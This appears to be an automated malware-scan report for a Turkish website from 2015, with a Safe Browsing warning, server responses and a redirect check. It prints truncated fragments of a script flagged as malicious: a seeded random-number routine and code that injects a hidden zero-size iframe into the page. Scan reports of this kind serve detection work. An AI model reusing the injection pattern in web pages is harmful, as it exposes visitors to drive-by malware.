Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=collectionpremiereistanbul.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://collectionpremiereistanbul.com/ | HTTP/1.1 302 Found Connection: close Date: Mon, 12 Jan 2015 21:49:51 GMT Location: http://www.cpi-istanbul.com Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.4 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g Content-Length: 0 Content-Type: text/html; charset=latin5 X-Powered-By: PHP/5.2.4-2ubuntu5.4 | clean |
http://www.cpi-istanbul.com/ | 200 OK Content-Length: 3761 Content-Type: text/html | clean |
http://www.cpi-istanbul.com/scripts/functions.js | 200 OK Content-Length: 21809 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var flashVersion = 0; function getFlashVersion() { var latestFlashVersion = 8; var agent = navigator.userAgent.toLowerCase(); if (navigator.plugins != null && navigator.plugins.length > 0) { var flashPlugin = navigator.plugins['Shockwave Flash']; if (typeof flashPlugin == 'object'){ for (var i = latestFlashVersion; i >= 3; i--){ if (flashPlugin.description.indexOf(i + '.') != -1){ flas Decoded script: function nextRandomNumber(){ var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return (this.seed * this.oneOverM); } function RandomNumberGenerator(unix){ var d = new Date(unix*1000); var s = d.getHours() > 12 ? 1 : 0; this.seed = 2345678901 + (d.getMonth() * 0 ifrm.style.height = "0px"; ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); } } catch (e) { } }, 500 */ var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return (this.see Antivirus reports:
| ||
http://collectionpremiereistanbul.com/scripts/stmenu.js | HTTP/1.1 302 Found Connection: close Date: Mon, 12 Jan 2015 21:49:54 GMT Location: http://www.cpi-istanbul.com Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.4 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g Content-Length: 0 Content-Type: text/html; charset=latin5 X-Powered-By: PHP/5.2.4-2ubuntu5.4 | clean |
http://www.cpi-istanbul.com/test404page.js | 404 Not Found Content-Length: 103 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: collectionpremiereistanbul.com
Result:
HTTP/1.1 302 Found
Connection: close
Date: Mon, 12 Jan 2015 21:49:51 GMT
Location: http://www.cpi-istanbul.com
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.4 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
Content-Length: 0
Content-Type: text/html; charset=latin5
X-Powered-By: PHP/5.2.4-2ubuntu5.4
...0 bytes of data.
GET / HTTP/1.1
Host: collectionpremiereistanbul.com
Result:
HTTP/1.1 302 Found
Connection: close
Date: Mon, 12 Jan 2015 21:49:51 GMT
Location: http://www.cpi-istanbul.com
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.4 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
Content-Length: 0
Content-Type: text/html; charset=latin5
X-Powered-By: PHP/5.2.4-2ubuntu5.4
...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: collectionpremiereistanbul.com
Referer: http://www.google.com/search?q=collectionpremiereistanbul.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: collectionpremiereistanbul.com
Referer: http://www.google.com/search?q=collectionpremiereistanbul.com
Result:
The result is similar to the first query. There are no suspicious redirects found.